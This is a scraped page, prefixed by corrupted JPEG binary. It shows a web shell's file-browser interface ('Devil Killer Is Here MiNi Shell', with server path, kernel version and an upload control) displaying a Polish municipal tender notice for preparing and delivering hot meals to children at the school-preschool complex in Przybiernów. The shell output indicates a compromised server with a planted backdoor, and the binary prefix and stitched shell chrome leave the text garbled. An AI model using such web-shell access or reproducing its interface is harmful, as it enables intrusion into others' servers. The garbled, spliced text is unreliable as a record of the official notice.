JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/thread-self/root/home/vmanager/www/common/web/tenders/20250801/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/thread-self/root/home/vmanager/www/common/web/tenders/20250801/0035749601-N-2025.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Usługa przygotowania i dostarczenia gorących posiłków dla dzieci w szkole i przedszkolu do Zespołu Szkolno-<br/>Przedszkolnego w Przybiernowie </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">GMINA PRZYBIERNÓW</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 811684344</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Cisowa 3</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Przybiernów</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">72-110</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">zachodniopomorskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL428 - Szczeciński</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">914667530</span></h3> <h3 class="mb-0">1.5.8.) Numer faksu: <span class="normal">914186622</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">sekretariat@przybiernow.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.przybiernow.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Usługa przygotowania i dostarczenia gorących posiłków dla dzieci w szkole i przedszkolu do Zespołu Szkolno-<br/>Przedszkolnego w Przybiernowie </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-753c87b9-2838-4fd3-a881-3d114e513964</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2025/BZP 00357496</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2025-08-01</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2025/BZP 00055877/02/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.3 Usługa przygotowania i dostarczenia gorących posiłków dla dzieci w szkole i przedszkolu do Zespołu Szkolno-Przedszkolnego w Przybiernowie</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://przybiernow.logintrade.net/rejestracja/ustawowe.html <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://przybiernow.logintrade.net/rejestracja/ustawowe.html</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">11.1. Komunikacja w postępowaniu o<br/>udzielenie zamówienia w tym składanie ofert, wymiana informacji oraz przekazywanie dokumentów lub oświadczeń między<br/>zamawiającym a wykonawcą, z uwzględnieniem wyjątków określonych w ustawie, odbywa się przy użyciu środków komunikacji<br/>elektronicznej. Przez środki komunikacji elektronicznej rozumie się środki komunikacji elektronicznej zdefiniowane w ustawie z dnia<br/>18 lipca 2002 r. o świadczeniu usług drogą elektroniczną (Dz. U. z 2020 r. poz. 344 ze zm.). 11.2. W postępowaniu o udzielenie<br/>zamówienia ofertę, oświadczenia, o którym mowa w art. 125 ust. 1 ustawy Pzp, podmiotowe środki dowodowe, pełnomocnictwa,<br/>zobowiązanie podmiotu udostępniającego zasoby składa się, pod rygorem nieważności, w formie elektronicznej lub w postaci<br/>elektronicznej opatrzonej podpisem zaufanym lub podpisem osobistym bądź kwalifikowanym podpisem elektronicznym.<br/>11.3.Zamawiający nie przewiduje sposobu komunikowania się z Wykonawcami w inny sposób niż określony w SWZ.<br/>11.4. Zamawiający informuje, iż wszelka korespondencja dotycząca niniejszego postępowania (pomiędzy zamawiającym a<br/>wykonawcami) będzie odbywała się w języku polskim za pośrednictwem Platformy Przetargowej Gminy Przybiernów:<br/>https://przybiernow.logintrade.net/rejestracja/ustawowe.html<br/>11.5. Zamawiający nie ponosi odpowiedzialności za złożenie przez Wykonawcę oferty w sposób niezgodny z instrukcją korzystania z<br/>www.logintrade.pl w szczególności za sytuację, gdy oferta nie zostanie złożona w miejscu wskazanym przez platformę określoną w<br/>punkcie 11.4 SWZ. Nieprawidłowe złożenie oferty skutkować będzie nieuwzględnieniem jej w prowadzonym postępowaniu.<br/>11.6. Do połączenia używany jest szyfrowany protokół HTTPS. Szyfrowanie danych odbywa się przy pomocy protokołu SSL.<br/>Certyfikat SSL zapewnia poufność transmisji danych przesyłanych przez Internet. Wykonawca posiadający konto na Platformie<br/>Przetargowej Gminy Przybiernów: ma dostęp do możliwości złożenia, zmiany, wycofania oferty, a także funkcjonalności<br/>pozwalających na zadawanie pytań do treści SWZ oraz komunikację z Zamawiającym w pozostałych obszarach.<br/>11.7. Wymagania techniczne wysyłania i odbierania dokumentów elektronicznych, elektronicznych kopii dokumentów i oświadczeń<br/>oraz informacji przekazywanych przy użyciu Platformy Przetargowej Gminy Przybiernów:<br/>1)<br/>dopuszczalne przeglądarki internetowe:<br/>•I<br/>nternet Explorer 10 i nowsze, Edge<br/>•<br/>Google Chrome<br/>•<br/>Mozilla Firefox<br/>•<br/>Opera<br/>2)<br/>pozostałe wymagania techniczne:<br/>•<br/>dostęp do sieci Internet<br/>•<br/>obsługa przez przeglądarkę protokołu XMLHttpRequest – ajax<br/>•<br/>włączona obsługa JavaScript<br/>•<br/>zalecana szybkość łącza internetowego powyżej 500 KB/s<br/>•<br/>zainstalowany Acrobat Reader<br/>•<br/>zainstalowane środowisko uruchomieniowe Java - Java SE Runtime Environment 6 Update 24 lub nowszy<br/>3)<br/>Oświadczenia lub dokumenty przekazywane za pośrednictwem środka komunikacji elektronicznej przesyła się w formatach danych<br/>określonych w przepisach wydanych na podstawie §2 ust. 1 i 2 Rozporządzenia Prezesa Rady Ministrów z dnia 30 grudnia 2020r.w<br/>sprawie sposobu sporządzania i przekazywania informacji oraz wymagań technicznych dla dokumentów elektronicznych oraz<br/>środków komunikacji elektronicznej w postępowaniu o udzielenie zamówienia publicznego lub konkursie (Dz.U. z 2020 r. poz. 2452).<br/>Równocześnie Zamawiający rekomenduje na format danych przesyłanych plików: pdf.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust. 1 i 2 Rozporządzenia Parlamentu Europejskiego i Rady (UE)<br/>2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie<br/>swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) informujemy,<br/>że:<br/>1)<br/>Administratorem danych osobowych Wykonawcy jest Wójt Gminy Przybiernów. Siedzibą wójta gminy jest Urząd Gminy w<br/>Przybiernowie, ul. Cisowa 3, 72-110 Przybiernów. Kontakt: osobisty w siedzibie urzędu, telefoniczny: +48 914186451 lub drogą<br/>elektroniczną na adres e-mail: sekretariat@przybiernow.pl<br/>2)W<br/>sprawach związanych z danymi osobowymi Wykonawca może kontaktować się z Inspektorem Ochrony Danych Osobowych,<br/>którym jest pan Bartosz Kaniuk, poprzez adres email: bkaniuk@proinspektor.pl<br/>3)<br/>Pani/Pana dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu związanym z postępowaniem o<br/>udzielenie zamówienia publicznego „Usługa przygotowania i dostarczenia gorących posiłków dla dzieci w szkole i przedszkolu do<br/>Zespołu Szkolno-Przedszkolnego w Przybiernowie” prowadzonym w trybie podstawowym bez przeprowadzenia negocjacji;<br/>4)<br/>Odbiorcami Pani/Pana danych osobowych będą osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania w<br/>oparciu o art. 74 ustawy z dnia 11 września 2019 r. – Prawo zamówień publicznych (Dz. U. z 2024 r. poz. 1320 ze zm.), dalej<br/>„ustawa Pzp”;<br/>5)<br/>Pani/Pana dane osobowe będą przechowywane, zgodnie z art. 78 ust. 1 ustawy Pzp, przez okres 4 lat od dnia zakończenia<br/>postępowania o udzielenie zamówienia, a jeżeli czas trwania umowy przekracza 4 lata, okres przechowywania obejmuje cały czas<br/>trwania umowy; a po tym czasie przez okres wymagany przepisami szczególnymi prawa, w szczególności ze względu na cele<br/>archiwalne- zgodnie z JRWA: dokumentacja zamówień publicznych posiada kategorię archiwalną B5 (okres przechowywania 5 lat)<br/>natomiast umowa zawartą w wyniku postępowania w trybie zamówień publicznych posiada kategorię archiwalną B10 (okres<br/>przechowywania 10 lat);<br/>6)<br/>Obowiązek podania przez Panią/Pana danych osobowych bezpośrednio Pani/Pana dotyczących jest wymogiem ustawowym<br/>określonym w przepisach ustawy Pzp, związanym z udziałem w postępowaniu o udzielenie zamówienia publicznego; konsekwencje<br/>niepodania określonych danych wynikają z ustawy Pzp;<br/>7)W<br/>odniesieniu do Pani/Pana danych osobowych decyzje nie będą podejmowane w sposób zautomatyzowany, stosowanie do art. 22<br/>RODO;</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">Posiada Pani/Pan:<br/>−n<br/>a podstawie art. 15 RODO prawo dostępu do danych osobowych Pani/Pana dotyczących;<br/>−n<br/>a podstawie art. 16 RODO prawo do sprostowania Pani/Pana danych osobowych **;<br/>−n<br/>a podstawie art. 18 RODO prawo żądania od administratora ograniczenia przetwarzania danych osobowych z zastrzeżeniem<br/>przypadków, o których mowa w art. 18 ust. 2 RODO ***;<br/>−p<br/>rawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy uzna Pani/Pan, że przetwarzanie danych<br/>osobowych Pani/Pana dotyczących narusza przepisy RODO;<br/>9)<br/>Nie przysługuje Pani/Panu:<br/>−<br/>w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych;<br/>−p<br/>rawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO;<br/>−n<br/>a podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż podstawą prawną przetwarzania<br/>Pani/Pana danych osobowych jest art. 6 ust. 1 lit. c RODO.<br/>* Wyjaśnienie: informacja w tym zakresie jest wymagana, jeżeli w odniesieniu do danego administratora lub podmiotu<br/>przetwarzającego istnieje obowiązek wyznaczenia inspektora ochrony danych osobowych.<br/>** Wyjaśnienie: skorzystanie z prawa do sprostowania nie może skutkować zmianą wyniku postępowania o udzielenie zamówienia<br/>publicznego ani zmianą postanowień umowy w zakresie niezgodnym z ustawą Pzp oraz nie może naruszać integralności protokołu<br/>oraz jego załączników.<br/>*** Wyjaśnienie: prawo do ograniczenia przetwarzania nie ma zastosowania w odniesieniu do przechowywania, w celu zapewnienia<br/>korzystania ze środków ochrony prawnej lub w celu ochrony praw innej osoby fizycznej lub prawnej, lub z uwagi na ważne względy<br/>interesu publicznego Unii Europejskiej lub państwa członkowskiego</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">GPB.271.6.2025</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest świadczenie usługi polegającej na przygotowaniu i dostarczaniu gorących posiłków, tj:<br/>a) śniadanie, posiłek dwudaniowy wraz z kompotem lub sokiem, podwieczorek dla dzieci uczęszczających do przedszkola –<br/>pełne wyżywienie (w przypadku, gdy drugie danie stanowi danie bez surówki do posiłku podajemy owoc np. naleśniki plus<br/>owoc),<br/>b) posiłek jednodaniowy dla dzieci uczęszczających do klas O - VIII, w układzie tygodniowym - 2 x pierwsze danie z<br/>deserem, 3x drugie danie z kompotem lub sokiem,<br/>4.2 Zamawiający informuje, że umowa zawarta z Wykonawcą wyłonionym w niniejszym postępowaniu obejmować będzie:<br/>a) posiłki płatne ze środków Ośrodka Pomocy Społecznej. Ilość dzieci uprawnionych do posiłków opłacanych przez Gminę<br/>(podopieczni OPS Przybiernów) 10. b) dopłatę gminy do posiłków po odliczeniu „wsadu do kotła”, za który płacą rodzice<br/>(obecnie odpłatność rodziców wynosi 9,00 zł w szkole i 16,00 zł w przedszkolu).<br/>4.3 Łączna ilość dzieci korzystających z dożywiania w Zespole Szkolno - Przedszkolnym w roku szkolnym 2024/2025<br/>wynosi 210, tj:<br/>a) Szkoła Podstawowa w Przybiernowie - 138 uczniów,<br/>b) Przedszkole Publiczne w Przybiernowie - 72 dzieci.<br/>4.4 Zamawiający zastrzega, że podane ilości korzystających z dożywiania są szacunkowe i określone przy 100% frekwencji,<br/>dlatego mogą ulec zmianie i Wykonawca nie może mieć w stosunku do Zamawiającego żadnych roszczeń z powodu<br/>realizacji umowy w mniejszym zakresie.<br/>4.5 Zamawiający przewiduje możliwość zmniejszenia bądź zwiększenia ilości wydawanych posiłków dziennie w zależności<br/>od potrzeb, jednakże zmiany te nie mogą spowodować zmiany ceny jednostkowej posiłku. W przypadku zmiany ilości<br/>posiłków, zgłaszanie ich ilości będzie odbywać się za pośrednictwem platformy e-stolowka.pl<br/>(https://przybiernowzsp.loca.pl) najpóźniej do godziny 7.00 rano w dniu zamówienia.<br/>4.6 Posiłki będą dostarczane do Zespołu Szkolno-Przedszkolnego w godzinach:<br/>do 8.30-dostawa śniadania dla dzieci z przedszkola<br/>11.20–11.35-dostawa obiadu i podwieczorka dla dzieci z przedszkola ( budynek A)<br/>11.20–11.35-dostawa obiadu dla dzieci ze szkoły podstawowej (budynek B i C).<br/>4.7 Wykonawca zobowiązany jest do przygotowania posiłków o najwyższym standardzie, na bazie produktów najwyższej<br/>jakości i stosownie do norm bezpieczeństwa zgodnych ze standardami HACCP, w jakości i konsystencji potraw<br/>odpowiednich dla dzieci w wieku od 2,5 do 16.<br/>4.8 Przy planowaniu posiłków należy uwzględnić zalecaną wartość energetyczną oraz uwzględnić normy produktów.<br/>Zamawiający w szczególności zakazuje stosowania: konserw, produktów z glutaminianem sodu, produktów<br/>masłopodobnych, soków zagęszczonych, mięsa odkostnionego mechanicznie oraz wędlin z dodatkiem preparatów<br/>białkowych (soja) i/lub skrobi modyfikowanej. Zamawiający zakazuje stosowania: produktów z zawartością barwników,<br/>konserwantów i zagęszczaczy szkodliwych dla zdrowia.<br/>4.9 Wykonawca jest odpowiedzialny za prawidłową temperaturę posiłków tj. zupy co najmniej 75°C, drugiego dania co<br/>najmniej 63°C.<br/>4.10 Wykonawca musi posiadać odpowiednio wykwalifikowany personel. Posiłki przygotowywane będą przez osoby<br/>posiadające zaświadczenie lekarskie z badań przeprowadzonych do celów sanitarno – epidemiologicznych.<br/>4.11 Przy planowaniu posiłków należy uwzględnić zalecaną wartość energetyczną, wielkość posiłków oraz normy produktów<br/>dla dzieci w wieku 2,5 - 16 lat. Wyklucza się posiłki sporządzane na bazie półproduktów oraz na bazie Fast Food lub<br/>mrożonych potraw.<br/>4.12 Odpowiedzialność za ciągłość żywienia ponosi Wykonawca.<br/>4.13 Wykonawca jest zobowiązany posiadać ważną decyzję (zezwolenie, opinię, protokół), lub inny dokument właściwego<br/>inspektora sanitarnego o dopuszczeniu do przygotowania posiłków i wydawania posiłków w zbiorowym żywieniu, w tym<br/>zezwolenie na prowadzenie cateringu.<br/>4.14 Wykonawca odpowiedzialny będzie za właściwe przechowywanie środków spożywczych, utrzymywanie odpowiedniej<br/>temperatury i innych warunków przechowywania, stan opakowań, higienę produkcji, sposób transportu posiłków. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">55321000-6 - Usługi przygotowywania posiłków</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">55524000-9 - Usługi dostarczania posiłków do szkół</p> <p class="mb-0">55523100-3 - Usługi w zakresie posiłków szkolnych</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja od do --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2025-09-01 do 2026-08-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Przy wyborze oferty najkorzystniejszej, zamawiający będzie się kierował następującymi kryteriami:<br/>a) cena oferty – 60% (Kcen)<br/>b) Lokalizacja siedziby Wykonawcy – 40% (Klok)<br/>19.1.1. Sposób obliczania punktów dla kryterium wymienionego w pkt „a” (Kcen)<br/>Kcen - Maksymalna ilość punktów możliwa do przydzielenia w toku oceny w obrębie danego kryterium. Dla kryterium cena przyjmuje<br/>się, że oferta z najniższą ceną otrzyma 60 punktów, obliczonych wg wzoru poniżej.<br/>Waga - 60%<br/>najniższa cena spośród ofert<br/>nieodrzuconych (brutto)<br/>Kcen = ------------------------------------------- x 100 x 60%<br/>cena (brutto) badanej oferty<br/>19.1.2. Sposób obliczania punktów dla kryterium wymienionego w pkt „c” (Klok)<br/>Klok - Maksymalna ilość punktów możliwa do przydzielenia w toku oceny w obrębie tego kryterium. Dla kryterium lokalizacja<br/>Zamawiający rozumie odległość od miejsca procesu technologicznego do miejsca siedziby Zamawiającego (72-110 Przybiernów, ul.<br/>Kościuszki 16) - 40 punktów, wg wzoru poniżej, przy zastosowaniu nw. punktacji:<br/>Waga – 40%<br/>Lokalizacja<br/>Ilość punktów<br/>Do 20,00 km<br/>40<br/>Od 20,01 km<br/>02<br/>0<br/>Klok = ilość punktów<br/>Zamawiający informację o deklarowanej odległości uzyska z załącznika nr 1 do SWZ., w których Wykonawca wpisze rzeczywistą<br/>odległość siedziby.<br/>Końcowa ocena ofert odbywać się będzie wg poniższego wzoru:<br/>Lp = Kcen + Klok<br/>Lp – całkowita ilość punktów uzyskanych przez ofertę<br/>Kcen – ilość punktów przyznana danej ofercie w kryterium cena<br/>Klok - ilość punktów przyznana danej ofercie w kryterium lokalizacja<br/>19.2. Oferty będą oceniane w odniesieniu do najkorzystniejszych warunków przedstawionych przez Wykonawców w zakresie<br/>kryterium. Oferta wypełniająca w najwyższym stopniu wymagania kryteriów otrzyma maksymalną ilość punktów. Pozostałym<br/>Wykonawcom, spełniającym wymagania kryterialne, przypisana zostanie odpowiednio mniejsza ilość punktów wyliczona na<br/>podstawie w/w wzorów.<br/>Za najkorzystniejszą zostanie uznana oferta, która uzyska najwyższą ocenę końcową wynikającą z sumy punktów z kryterium cena<br/>+ lokalizacja<br/>19.3. Jeżeli nie można wybrać najkorzystniejszej oferty z uwagi na to, że dwie lub więcej ofert przedstawia taki sam bilans ceny lub<br/>kosztu i innych kryteriów oceny ofert, zamawiający wybiera spośród tych ofert ofertę, która otrzymała najwyższą ocenę w kryterium o<br/>najwyższej wadze.<br/>19.4. Jeżeli oferty otrzymały taką sama ocenę w kryterium o najwyższej wadze, zamawiający wybiera ofertę z najniższą ceną lub<br/>najniższym kosztem.<br/>19.5. Jeżeli nie można dokonać wyboru w sposób, o którym mowa w pkt 19.4 SWZ Zamawiający wzywa wykonawców, którzy złożyli<br/>te oferty, do złożenia w terminie określonym przez Zamawiającego ofert dodatkowych zawierających nową cenę lub koszt.<br/>19.6. Wykonawcy składając oferty dodatkowe, nie mogą oferować cen lub kosztów wyższych niż zaoferowane w uprzednio<br/>złożonych przez nich ofertach.<br/>19.7. W toku badania i oceny ofert zamawiający może żądać od wykonawców wyjaśnień dotyczących treści złożonych ofert oraz<br/>przedmiotowych środków dowodowych lub innych składanych dokumentów lub oświadczeń. Niedopuszczalne jest prowadzenie<br/>między zamawiającym a wykonawcą negocjacji dotyczących złożonej oferty oraz, z uwzględnieniem art. 223 ust.2 Prawo zamówień<br/>publicznych, dokonywanie jakiejkolwiek zmiany w jej treści. 19.8. Zamawiający poprawia w ofercie: 1) oczywiste omyłki pisarskie, 2)<br/>oczywiste omyłki rachunkowe, z uwzględnieniem konsekwencji rachunkowych dokonanych poprawek, 3) inne omyłki polegające na<br/>niezgodności oferty z dokumentami zamówienia, 